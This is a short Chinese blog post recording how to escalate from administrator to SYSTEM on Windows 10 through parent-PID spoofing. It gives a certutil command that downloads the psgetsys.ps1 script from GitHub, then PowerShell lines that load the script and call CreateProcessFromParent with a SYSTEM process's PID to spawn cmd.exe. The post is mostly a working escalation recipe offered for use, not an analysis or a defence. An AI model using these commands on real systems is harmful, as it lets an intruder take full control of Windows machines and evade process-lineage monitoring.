win10从administrator提权到system(更改父进程的pid)
·
前言
看到一篇博客讲的一个powershell脚本,下载利用后确实可以成功,特作记录。
实现
- 脚本下载
certutil -urlcache -split -f https://raw.githubusercontent.com/decoder-it/psgetsystem/master/psgetsys.ps1
- 在windows下启动一个administrator权限的powershell
. .\psgetsys.ps1
[MyProcess]::CreateProcessFromParent(648,"c:\windows\system32\cmd.exe","")
一般情况下将上面命令中的648改为任意一个system权限的进程的pid即可,例如:
查考文章
更多推荐
已为社区贡献10条内容
所有评论(0)